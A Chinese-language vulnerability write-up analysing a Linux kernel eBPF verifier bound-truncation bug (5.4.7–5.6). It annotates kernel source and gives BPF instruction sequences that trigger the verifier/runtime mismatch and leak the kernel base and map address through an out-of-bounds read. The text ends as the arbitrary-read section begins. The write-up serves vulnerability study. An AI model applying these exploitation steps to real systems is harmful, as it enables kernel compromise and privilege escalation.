文章目录
- 前言
- 漏洞分析
- do_check 函数
- 漏洞利用
- 漏洞触发
- 越界读实现地址泄漏
- 越界写实现任意读
- 越界写实现任意写
- exp 及效果演示
- 参考
前言
影响版本:v5.4.7 ~ v5.5.0
以及更新的版本,如 5.6
编译选项:CONFIG_BPF_SYSCALL,以及 config 中所有带 BPF 字样的编译选项
漏洞概述:该漏洞是在 commit 581738a681b6 中引入,verifier
没有正确地将64位值转换为32位(直接取低32位),使得 BPF
寄存器的值在代码验证阶段和实际执行阶段不一致,导致越界读写
测试环境:linux-5.6.0
漏洞分析
ebpf
程序在被加载到内核后,首先会模拟执行一遍以此检查 ebpf
中可能出现的错误或者恶意代码。而 verifier
会对 ebpf
进行静态检查,漏洞调用链如下:
bpf_check
do_check_main
do_check_common
do_check
check_cond_jmp_op
reg_set_min_max
在 bpf_prog_load
中可以看到这里会执行 verifier -- bpf_check
:
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
......
/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;
......
}
bpf_check
会调用到 do_check_main
函数:
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
union bpf_attr __user *uattr)
{
......
ret = check_cfg(env);
if (ret < 0)
goto skip_full_check;
ret = do_check_subprogs(env);
ret = ret ?: do_check_main(env);
if (ret == 0 && bpf_prog_is_dev_bound(env->prog->aux))
ret = bpf_prog_offload_finalize(env);
......
}
do_check_main
主要就是调用了 do_check_common
函数:
/*
 * Verify the main program: run do_check_common() for subprog 0, starting at
 * the first instruction. Returns whatever do_check_common() returns.
 */
static int do_check_main(struct bpf_verifier_env *env)
{
int ret;
/* Verification starts at instruction index 0. */
env->insn_idx = 0;
ret = do_check_common(env, 0);
/* Only on success: copy subprog 0's stack depth into the program's aux data. */
if (!ret)
env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
return ret;
}
do_check_common
最后会调用到 do_check
函数:
static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
......
ret = do_check(env);
......
}
最后的漏洞也是出现在 do_check
函数中,所以这里重点看下 do_check
函数。
do_check 函数
do_check
函数有点长,这里我还是重点看漏洞出现的执行分支:
static int do_check(struct bpf_verifier_env *env)
{
struct bpf_verifier_state *state = env->cur_state;
struct bpf_insn *insns = env->prog->insnsi;
struct bpf_reg_state *regs;
int insn_cnt = env->prog->len;
bool do_print_state = false;
int prev_insn_idx = -1;
// 遍历每一条指令
for (;;) {
struct bpf_insn *insn;
u8 class;
int err;
env->prev_insn_idx = prev_insn_idx; // 前一条指令 idx
if (env->insn_idx >= insn_cnt) { // insn_cnt 为指令总数量
verbose(env, "invalid insn idx %d insn_cnt %d\n", env->insn_idx, insn_cnt);
return -EFAULT;
}
insn = &insns[env->insn_idx]; // 获取指令
class = BPF_CLASS(insn->code); // 获取指令类型
// 指令数量有限制
if (++env->insn_processed > BPF_COMPLEXITY_LIMIT_INSNS) {
verbose(env, "BPF program is too large. Processed %d insn\n", env->insn_processed);
return -E2BIG;
}
// 该指令是否处理过
err = is_state_visited(env, env->insn_idx);
if (err < 0)
return err;
if (err == 1) {
/* found equivalent state, can prune the search */
if (env->log.level & BPF_LOG_LEVEL) {
// log 相关的东西
}
goto process_bpf_exit;
}
if (signal_pending(current))
return -EAGAIN;
if (need_resched())
cond_resched();
// log 相关的东西
if (env->log.level & BPF_LOG_LEVEL2 ||
(env->log.level & BPF_LOG_LEVEL && do_print_state)) {
......
}
if (env->log.level & BPF_LOG_LEVEL) {
// log 相关的东西
......
}
if (bpf_prog_is_dev_bound(env->prog->aux)) {
err = bpf_prog_offload_verify_insn(env, env->insn_idx,
env->prev_insn_idx);
if (err)
return err;
}
regs = cur_regs(env);
env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
prev_insn_idx = env->insn_idx;
// 下面就是针对不同的指令类型进行不同的检查处理了
// 这里我们主要关注跳转指令,这里也是漏洞分支
if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err) return err;
} else if (class == BPF_LDX) {
enum bpf_reg_type *prev_src_type, src_reg_type;
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK);
if (err) return err;
src_reg_type = regs[insn->src_reg].type;
err = check_mem_access(env, env->insn_idx, insn->src_reg,
insn->off, BPF_SIZE(insn->code),
BPF_READ, insn->dst_reg, false);
......
} else if (class == BPF_STX) {
enum bpf_reg_type *prev_dst_type, dst_reg_type;
if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, env->insn_idx, insn);
if (err) return err;
env->insn_idx++;
continue;
}
/* check src1 operand */
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
/* check src2 operand */
err = check_reg_arg(env, insn->dst_reg, SRC_OP);
if (err) return err;
dst_reg_type = regs[insn->dst_reg].type;
/* check that memory (dst_reg + off) is writeable */
err = check_mem_access(env, env->insn_idx, insn->dst_reg,
insn->off, BPF_SIZE(insn->code),
BPF_WRITE, insn->src_reg, false);
......
} else if (class == BPF_ST) {
......
} else if (class == BPF_JMP || class == BPF_JMP32) {
// 针对跳转指令的处理,有 32 位跳转和 64 位跳转
u8 opcode = BPF_OP(insn->code);
env->jmps_processed++;
if (opcode == BPF_CALL) {
// call 指令
......
} else if (opcode == BPF_JA) {
// ja 指令
......
} else if (opcode == BPF_EXIT) {
// exit 指令
......
process_bpf_exit:
......
} else {
// 条件跳转指令
err = check_cond_jmp_op(env, insn, &env->insn_idx);
if (err) return err;
}
} else if (class == BPF_LD) {
......
} else {
verbose(env, "unknown insn class %d\n", class);
return -EINVAL;
}
env->insn_idx++;
}
return 0;
}
条件跳转指令会由 check_cond_jmp_op
函数进行处理:
static int check_cond_jmp_op(struct bpf_verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct bpf_verifier_state *this_branch = env->cur_state;
struct bpf_verifier_state *other_branch;
struct bpf_reg_state *regs = this_branch->frame[this_branch->curframe]->regs;
struct bpf_reg_state *dst_reg, *other_branch_regs, *src_reg = NULL;
u8 opcode = BPF_OP(insn->code);
bool is_jmp32;
int pred = -1;
int err;
/* Only conditional jumps are expected to reach here. */
// 检查是否是 >条件分支跳转<
if (opcode == BPF_JA || opcode > BPF_JSLE) {
verbose(env, "invalid BPF_JMP/JMP32 opcode %x\n", opcode);
return -EINVAL;
}
// 操作数是寄存器
if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
return -EINVAL;
}
/* check src1 operand */
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
if (is_pointer_value(env, insn->src_reg)) {
verbose(env, "R%d pointer comparison prohibited\n", insn->src_reg);
return -EACCES;
}
src_reg = ®s[insn->src_reg];
// 操作数是立即数
} else {
// src_reg 必须是 0
if (insn->src_reg != BPF_REG_0) {
verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
return -EINVAL;
}
}
/* check src2 operand */
err = check_reg_arg(env, insn->dst_reg, SRC_OP);
if (err) return err;
// 获取目的寄存器 dst_reg
dst_reg = ®s[insn->dst_reg];
// 是否 jmp32
is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
// is_branch_taken 主要就是检查分支是否可以预测
// 比如这里是立即数跳转:dst_reg 寄存器的 umin = 1, umax = 7,而 imm = 0
// 那么对于 jle dst_reg imm off 而言:dst_reg.umin > imm,所以这里可以肯定不会跳转
// 所以为了使得 pred = -1,就得让 dst_reg 为 uknown
// 这里可以从 map 中加载数据到 dst_reg 中使得 dst_reg 为 unknown
if (BPF_SRC(insn->code) == BPF_K)
pred = is_branch_taken(dst_reg, insn->imm, opcode, is_jmp32);
else if (src_reg->type == SCALAR_VALUE && tnum_is_const(src_reg->var_off))
pred = is_branch_taken(dst_reg, src_reg->var_off.value, opcode, is_jmp32);
if (pred >= 0) {
err = mark_chain_precision(env, insn->dst_reg);
if (BPF_SRC(insn->code) == BPF_X && !err)
err = mark_chain_precision(env, insn->src_reg);
if (err) return err;
}
// 可以看到这里的 if-else pred = 0/1 都会直接返回
// 为了使得向下执行,得让 pred = -1,即寄存器为 unknown
if (pred == 1) {
/* only follow the goto, ignore fall-through */
*insn_idx += insn->off;
return 0;
} else if (pred == 0) {
/* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
// 保存另一个分支
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx, false);
if (!other_branch)
return -EFAULT;
// 获取另一个分支寄存器的状态
other_branch_regs = other_branch->frame[other_branch->curframe]->regs;
/* detect if we are comparing against a constant value so we can adjust
* our min/max values for our dst register.
* this is only legit if both are scalars (or pointers to the same
* object, I suppose, but we don't support that right now), because
* otherwise the different base pointers mean the offsets aren't
* comparable.
*/
// 操作数是寄存器
if (BPF_SRC(insn->code) == BPF_X) {
struct bpf_reg_state *src_reg = ®s[insn->src_reg];
struct bpf_reg_state lo_reg0 = *dst_reg;
struct bpf_reg_state lo_reg1 = *src_reg;
struct bpf_reg_state *src_lo, *dst_lo;
dst_lo = &lo_reg0;
src_lo = &lo_reg1;
coerce_reg_to_size(dst_lo, 4);
coerce_reg_to_size(src_lo, 4);
if (dst_reg->type == SCALAR_VALUE &&
src_reg->type == SCALAR_VALUE) {
if (tnum_is_const(src_reg->var_off) ||
(is_jmp32 && tnum_is_const(src_lo->var_off)))
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
else if (tnum_is_const(dst_reg->var_off) ||
(is_jmp32 && tnum_is_const(dst_lo->var_off)))
reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
src_reg,
is_jmp32
? dst_lo->var_off.value
: dst_reg->var_off.value,
opcode, is_jmp32);
else if (!is_jmp32 &&
(opcode == BPF_JEQ || opcode == BPF_JNE))
/* Comparing for equality, we can combine knowledge */
reg_combine_min_max(&other_branch_regs[insn->src_reg],
&other_branch_regs[insn->dst_reg],
src_reg, dst_reg, opcode);
}
} else if (dst_reg->type == SCALAR_VALUE) {
// 操作数是立即数,这里是直接调用了 reg_set_min_max 进行处理
reg_set_min_max(&other_branch_regs[insn->dst_reg], dst_reg, insn->imm, opcode, is_jmp32);
}
/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
* NOTE: these optimizations below are related with pointer comparison
* which will never be JMP32.
*/
if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
reg_type_may_be_null(dst_reg->type)) {
/* Mark all identical registers in each branch as either
* safe or unknown depending R == 0 or R != 0 conditional.
*/
mark_ptr_or_null_regs(this_branch, insn->dst_reg, opcode == BPF_JNE);
mark_ptr_or_null_regs(other_branch, insn->dst_reg, opcode == BPF_JEQ);
} else if (!try_match_pkt_pointers(insn, dst_reg, ®s[insn->src_reg], this_branch, other_branch) & is_pointer_value(env, insn->dst_reg)) {
verbose(env, "R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
}
if (env->log.level & BPF_LOG_LEVEL)
print_verifier_state(env, this_branch->frame[this_branch->curframe]);
return 0;
}
可以看到针对立即数条件跳转指令,调用了 reg_set_min_max
进行处理:
这里得说明一下,这里的
true_reg
其实就是dst_reg
,通过调试可以验证
/* Adjusts the register min/max values in the case that the dst_reg is the
 * variable register that we are working on, and src_reg is a constant or we're
 * simply doing a BPF_K check.
 * In JEQ/JNE cases we also adjust the var_off values.
 *
 * @true_reg:  register state on the path where the jump is taken
 *             (check_cond_jmp_op() passes &other_branch_regs[insn->dst_reg])
 * @false_reg: register state on the fall-through path
 *             (check_cond_jmp_op() passes dst_reg of the current state)
 * @val:       constant the register is compared against
 * @opcode:    jump opcode (BPF_JEQ, BPF_JGT, ...)
 * @is_jmp32:  true when only the low 32 bits are compared
 */
static void reg_set_min_max(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
s64 sval;
/* If the dst_reg is a pointer, we can't learn anything about its
 * variable offset from the compare (unless src_reg were a pointer into
 * the same object, but we don't bother with that.
 * Since false_reg and true_reg have the same type by construction, we
 * only need to check one of them for pointerness.
 */
if (__is_pointer_value(false, false_reg))
return;
/* For JMP32 only the low 32 bits of val are used; sval is the
 * sign-extended view of the same constant.
 */
val = is_jmp32 ? (u32)val : val;
sval = is_jmp32 ? (s64)(s32)val : (s64)val;
switch (opcode) {
case BPF_JEQ:
case BPF_JNE:
{
struct bpf_reg_state *reg = opcode == BPF_JEQ ? true_reg : false_reg;
/* For BPF_JEQ, if this is false we know nothing Jon Snow, but
 * if it is true we know the value for sure. Likewise for
 * BPF_JNE.
 */
if (is_jmp32) {
/* Only the low 32 bits become known; the high 32 bits of
 * var_off keep their old value and mask.
 */
u64 old_v = reg->var_off.value;
u64 hi_mask = ~0xffffffffULL;
reg->var_off.value = (old_v & hi_mask) | val;
reg->var_off.mask &= hi_mask;
} else {
__mark_reg_known(reg, val);
}
break;
}
case BPF_JSET:
false_reg->var_off = tnum_and(false_reg->var_off, tnum_const(~val));
if (is_power_of_2(val))
true_reg->var_off = tnum_or(true_reg->var_off, tnum_const(val));
break;
case BPF_JGE:
case BPF_JGT:
{
/* Unsigned >= / >: lowers false_reg's umax and raises true_reg's
 * umin (for BPF_JGE, true_umin is val itself).
 */
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
case BPF_JSGE:
case BPF_JSGT:
{
s64 false_smax = opcode == BPF_JSGT ? sval : sval - 1;
s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;
/* If the full s64 was not sign-extended from s32 then don't
 * deduct further info.
 */
if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
break;
false_reg->smax_value = min(false_reg->smax_value, false_smax);
true_reg->smin_value = max(true_reg->smin_value, true_smin);
break;
}
case BPF_JLE:
case BPF_JLT:
{
/* Unsigned <= / <: raises false_reg's umin and lowers true_reg's
 * umax (for BPF_JLE, true_umax is val itself).
 */
u64 false_umin = opcode == BPF_JLT ? val : val + 1;
u64 true_umax = opcode == BPF_JLT ? val - 1 : val;
if (is_jmp32) {
false_umin += gen_hi_min(false_reg->var_off);
true_umax += gen_hi_max(true_reg->var_off);
}
false_reg->umin_value = max(false_reg->umin_value, false_umin);
true_reg->umax_value = min(true_reg->umax_value, true_umax);
break;
}
case BPF_JSLE:
case BPF_JSLT:
{
s64 false_smin = opcode == BPF_JSLT ? sval : sval + 1;
s64 true_smax = opcode == BPF_JSLT ? sval - 1 : sval;
if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
break;
false_reg->smin_value = max(false_reg->smin_value, false_smin);
true_reg->smax_value = min(true_reg->smax_value, true_smax);
break;
}
default:
break;
}
__reg_deduce_bounds(false_reg);
__reg_deduce_bounds(true_reg);
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
/* JMP32 only: additionally refine var_off via __reg_bound_offset32(),
 * the function this write-up identifies as the source of the bug.
 */
if (is_jmp32) {
__reg_bound_offset32(false_reg);
__reg_bound_offset32(true_reg);
}
/* Intersecting with the old var_off might have improved our bounds
 * slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
 * then new var_off is (0; 0x7f...fc) which improves our umax.
 */
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}
主要来看下 __reg_bound_offset32
函数:
/*
 * Build a tnum covering every value in [min, max]: bits above the highest bit
 * in which min and max differ are copied from min; that bit and everything
 * below it are marked unknown.
 *
 * Worked example used in this write-up: the register has umin = 0x1 and
 * umax = 0x1_0000_0001, but __reg_bound_offset32() masks both bounds to their
 * low 32 bits before calling here, so min = 1 and max = 1.
 */
struct tnum tnum_range(u64 min, u64 max)
{
/* Example: chi = 1 ^ 1 = 0 (the masked bounds are equal). */
u64 chi = min ^ max, delta;
/*
 * fls64() returns the 1-based position of the most significant set bit,
 * or 0 when no bit is set, e.g. 5 = 0b101 ==> fls64(5) = 3.
 * Example: bits = fls64(0) = 0.
 */
u8 bits = fls64(chi);
/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
 * if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
 * constant min (since min == max).
 */
/* Example: delta = (1ULL << 0) - 1 = 0. */
delta = (1ULL << bits) - 1;
/* Example: result is { value = 1, mask = 0 }, i.e. the constant 1. */
return TNUM(min & ~delta, delta);
}
/*
 * Refine reg->var_off after a JMP32 comparison: the low 32 bits of var_off are
 * intersected with a tnum built from the register's unsigned bounds, and the
 * high 32 bits of var_off are kept unchanged.
 *
 * This is the buggy step analysed in this write-up: umin_value/umax_value are
 * 64-bit bounds and are each masked to 32 bits independently, so the pair
 * handed to tnum_range() need not describe the register's real low 32 bits.
 */
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
/* The arguments handed to tnum_range() simply drop the upper 32 bits. */
u64 mask = 0xffffFFFF;
/*
 * Example: umin_value = 0x1, umax_value = 0x1_0000_0001
 * ==> tnum_range(1, 1) ==> range = { value = 1, mask = 0 }
 */
struct tnum range = tnum_range(reg->umin_value & mask, reg->umax_value & mask);
/* Low 32 bits of the current var_off. */
struct tnum lo32 = tnum_cast(reg->var_off, 4);
/* High 32 bits of the current var_off (low half shifted out and back in as zeros). */
struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
/*
For reference, the two tnum helpers used below:

struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;
v = a.value | b.value;
mu = a.mask & b.mask;
return TNUM(v & ~mu, mu);
}
struct tnum tnum_or(struct tnum a, struct tnum b)
{
u64 v, mu;
v = a.value | b.value;
mu = a.mask | b.mask;
return TNUM(v, mu & ~v);
}
*/
/*
 * With range = { value = 1, mask = 0 }:
 *   tnum_intersect(lo32, range) ==> { value = lo32.value | 1, mask = 0 }
 *   tnum_or(hi32, that)         ==> { value = hi32.value | lo32.value | 1,
 *                                     mask  = hi32.mask & ~value }
 * Net effect on reg->var_off:
 *   low 32 bits:  mask = 0 (fully "known"), value = lo32.value | 1
 *                 (= 1 when the low half was previously unknown)
 *   high 32 bits: value and mask come from hi32
 */
reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}
这里请看注释漏洞很明显了,这里对于一个寄存器 dst_reg
,其 umin = 1, umax = 0x1 0000 0001
,再经过 __reg_bound_offset32
处理后,其 var_off
被设置了 { value = 0xXXXX XXXX 0000 0001, mask = 0xXXXX XXXX 0000 0000 }
,即这里的低 32 位是确定了的。
所以问题就来了,这里的 dst_reg 的低 32 位并不一定是确定的:正如上述所说,我们可以从 map 中加载值到 dst_reg 中,所以此时 dst_reg 的值在运行时是可变的,但经过 __reg_bound_offset32 处理后,verifier 却认为其低 32 位是一个确定的值。
漏洞利用
漏洞触发
注意事项:
- 想要执行到 reg_set_min_max 路径,必须绕过 is_branch_taken,即 dst_reg 应该是不确定的
- 要让 dst_reg.umin = 1, dst_reg.umax = 0x1 0000 0001
问题1解决方案
加载 map
的值到 dst_reg
中:
可以看到 dst_reg = reg6
的 var_off
是 unknown
的,其可以执行到 reg_set_min_max
:
问题2解决方案
这里得重新回到 reg_set_min_max
函数:
static void reg_set_min_max(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
s64 sval;
if (__is_pointer_value(false, false_reg))
return;
val = is_jmp32 ? (u32)val : val;
sval = is_jmp32 ? (s64)(s32)val : (s64)val;
switch (opcode) {
case BPF_JEQ:
case BPF_JNE:
......
case BPF_JSET:
......
case BPF_JGE:
case BPF_JGT:
{
// BPF_JGE change true_reg.umin_value
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
case BPF_JSGE:
case BPF_JSGT:
......
case BPF_JLE:
case BPF_JLT:
{
u64 false_umin = opcode == BPF_JLT ? val : val + 1;
u64 true_umax = opcode == BPF_JLT ? val - 1 : val;
if (is_jmp32) {
false_umin += gen_hi_min(false_reg->var_off);
true_umax += gen_hi_max(true_reg->var_off);
}
false_reg->umin_value = max(false_reg->umin_value, false_umin);
true_reg->umax_value = min(true_reg->umax_value, true_umax);
break;
}
case BPF_JSLE:
case BPF_JSLT:
......
default:
break;
}
__reg_deduce_bounds(false_reg);
__reg_deduce_bounds(true_reg);
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
if (is_jmp32) {
__reg_bound_offset32(false_reg);
__reg_bound_offset32(true_reg);
}
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}
看到这里的第 1/2 个参数,分别是 true_reg
和 false_reg
,我们将断点打在这个函数这里,然后查看其参数:
可以发现这里的 true_reg
就是 dst_reg
,所以我们可以在 reg_set_min_max
函数中利用 BPF_JGT
和 BPF_JLT
修改 dst_reg
的 umin/umax
1、修改 dst_reg.umin = 1
这里很简单,在 reg_set_min_max
中,可以看到:
case BPF_JGE:
case BPF_JGT:
{
// BPF_JGE change true_reg.umin_value
// val = insn->imm = imm
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
所以我们可以通过如下指令去设置 dst_reg.umin = 1
: 这里的 dst_reg
为 reg6
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1)
执行完后,可以看到 umin
成功被修改为 1
:
2、修改 dst_reg.umax = 0x1 0000 0001
这里如果我们参考修改 umin
的话,你会发现一个问题,即这里的 val = 0x1 0000 0001
,而 imm
是 int
类型,所以这里是无法直接利用立即数条件跳转的
所以这里还是得回到 check_cond_jmp_op
函数:
/* Excerpt from check_cond_jmp_op(): bounds refinement once the branch is unknown. */
if (BPF_SRC(insn->code) == BPF_X) {
	/* Register operand. */
	struct bpf_reg_state *src_reg = &regs[insn->src_reg];
	struct bpf_reg_state lo_reg0 = *dst_reg;
	struct bpf_reg_state lo_reg1 = *src_reg;
	struct bpf_reg_state *src_lo, *dst_lo;

	/* Copies of both registers coerced to 4 bytes, used by the JMP32 checks. */
	dst_lo = &lo_reg0;
	src_lo = &lo_reg1;
	coerce_reg_to_size(dst_lo, 4);
	coerce_reg_to_size(src_lo, 4);

	if (dst_reg->type == SCALAR_VALUE &&
	    src_reg->type == SCALAR_VALUE) {
		/* src_reg is a known constant: its full 64-bit value is passed as val. */
		if (tnum_is_const(src_reg->var_off) ||
		    (is_jmp32 && tnum_is_const(src_lo->var_off)))
			reg_set_min_max(&other_branch_regs[insn->dst_reg],
					dst_reg,
					is_jmp32
					? src_lo->var_off.value
					: src_reg->var_off.value,
					opcode, is_jmp32);
		else if (tnum_is_const(dst_reg->var_off) ||
			 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
			......
		else if (!is_jmp32 &&
			 (opcode == BPF_JEQ || opcode == BPF_JNE))
			......
	}
} else if (dst_reg->type == SCALAR_VALUE) {
	/* Immediate operand: val is insn->imm. */
	reg_set_min_max(&other_branch_regs[insn->dst_reg],
			dst_reg, insn->imm, opcode, is_jmp32);
}
可以看到这里针对寄存器条件跳转的处理,当 src_reg->var_off
是一个确定的值时,其会调用:
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
这里我们如果执行 64 位跳转,则执行函数如下:
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg, src_reg->var_off.value, opcode, is_jmp32);
然后就和立即数条件跳转类似了,不同的是,立即数条件跳转 val
传入的是 imm
,而这里 val
传入的是 src_reg->var_off.value
,而 imm
是 int
类型,但是 src_reg->var_off.value
是 64 位的。
通过以下代码修改 umax
:
BPF_MOV64_IMM(BPF_REG_8, 1),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1),
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),
可能这里读者会疑惑:为什么不直接用一条 MOV 立即数指令设置 src_reg = r8 = 0x1 0000 0001 呢?因为 imm 为 int 类型(32 位),无法直接表示这个值
调试跟踪:
执行 JLE
处理后:
漏洞触发
漏洞触发比较简单,使用 JMP32
即可,同样 dst_reg
要求 unknown
:
BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),
效果如下:
可以看到 dst_reg
只有第 32 位不确定,其它位都是确定的。这里为了消除第 32 位的影响,我们使用 AND
操作:
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),
这里 r6 & 2:verifier 认为 r6 的低 32 位恒为 1(即第 1 位为 0),虽然 r6 的第 32 位是不确定的,但是 2 的第 32 位为 0,所以不管 r6 的第 32 位是 1 还是 0,verifier 都认为 r6 & 2 的结果是 0,然后再 r6 >> 1 也是恒为 0 了:
但是这里是存在问题的,因为 r6
的值是从 map
中加载的,所以这里我们可以设置 r6 = 2
,所以真实的情况是:r6 & 2 = 2 & 2 = 2
,然后 r6 >>1 = 2 >> 1 = 1
。所以实际运行时 r6 = 1
而不是 r6 = 0
。
越界读实现地址泄漏
这里主要通过越界读泄漏 kernel base
和 map_addr
这里借助 ebpf
的一个助手函数 bpf_map_lookup_elem_proto
/*
 * Body of the bpf_map_lookup_elem helper: forwards (map, key) to the map's
 * own map_lookup_elem operation and returns the resulting pointer cast to
 * unsigned long.
 */
BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
{
/* Warn (once) if the caller does not hold the RCU read lock. */
WARN_ON_ONCE(!rcu_read_lock_held());
return (unsigned long) map->ops->map_lookup_elem(map, key);
}
/*
 * Prototype record for the bpf_map_lookup_elem helper: names the function and
 * declares its return type and its two argument types.
 */
const struct bpf_func_proto bpf_map_lookup_elem_proto = {
.func = bpf_map_lookup_elem,
.gpl_only = false,
.pkt_access = true,
/* The result is a map-value pointer that may be NULL. */
.ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL,
/* arg1: the map pointer; arg2: pointer to the lookup key. */
.arg1_type = ARG_CONST_MAP_PTR,
.arg2_type = ARG_PTR_TO_MAP_KEY,
};
可以看到 bpf_map_lookup_elem
函数直接调用了 map->ops->map_lookup_elem(map, key)
,struct bpf_map
定义如下:
可以看到其第一个域为一个 bpf_map_ops
,这里我们创建的是 array map
,所以 bpf_map_ops
为 array_map_ops
:
/*
 * Operations table for array maps. For a map using this table,
 * map->ops->map_lookup_elem is array_map_lookup_elem and
 * map->ops->map_get_next_key is array_map_get_next_key.
 */
const struct bpf_map_ops array_map_ops = {
.map_alloc_check = array_map_alloc_check,
.map_alloc = array_map_alloc,
.map_free = array_map_free,
.map_get_next_key = array_map_get_next_key,
.map_lookup_elem = array_map_lookup_elem,
.map_update_elem = array_map_update_elem,
.map_delete_elem = array_map_delete_elem,
.map_gen_lookup = array_map_gen_lookup,
.map_direct_value_addr = array_map_direct_value_addr,
.map_direct_value_meta = array_map_direct_value_meta,
.map_mmap = array_map_mmap,
.map_seq_show_elem = array_map_seq_show_elem,
.map_check_btf = array_map_check_btf,
};
所以 map->ops->map_lookup_elem
就是 array_map_lookup_elem
函数:
/*
 * Array-map lookup: returns a pointer to the element selected by *key, or
 * NULL when the index is not below max_entries.
 */
static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
/* map is a member of struct bpf_array; recover the enclosing array. */
struct bpf_array *array = container_of(map, struct bpf_array, map);
/* The key is read as a u32 element index. */
u32 index = *(u32 *)key;
if (unlikely(index >= array->map.max_entries))
return NULL;
/* Element address = value base + elem_size * (index masked with index_mask). */
return array->value + array->elem_size * (index & array->index_mask);
}
可以看到 map [struct bpf_map]
其实是 array [struct bpf_array]
的一个成员,struct bpf_array
定义如下:
有趣的来啦,array_map_lookup_elem
读取的 value
域在 map
的下方,所以这里通过越界读取是可以直接读取 map
中的内容的,所以这里就可以直接读取 map.bpf_map_ops
去泄漏内核基地址了。而 value
的起始地址相对 map
起始地址为 0x110
,所以可以通过如下指令进行越界读取:
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),
经过上面的分析我们知道,在验证阶段 r6 = 0
,所以 r6*0x110 = 0
,而实际运行时 r6 = 1
,所以 r6*0x110=0x110
。这时候如果我们读取 value[-r6]
是可以通过验证的,因为验证阶段当作了 value[-0] = value[0]
,但是在实际运行时读取的是 value[-0x110]
,从而直接泄漏 bpf_map_ops
那现在如何泄漏 map_addr
地址呢【这里泄漏 map_addr
主要是为后面任意写做准备的】?在 bpf_map
中,保存着自己的地址:
所以我们也可以通过越界读取直接泄漏 map_addr
越界写实现任意读
BPF Type Format(BTF)
是一种元数据格式,用于给 eBPF
提供一些额外的信息,在内核中使用 btf
结构体表示一条 btf
信息:
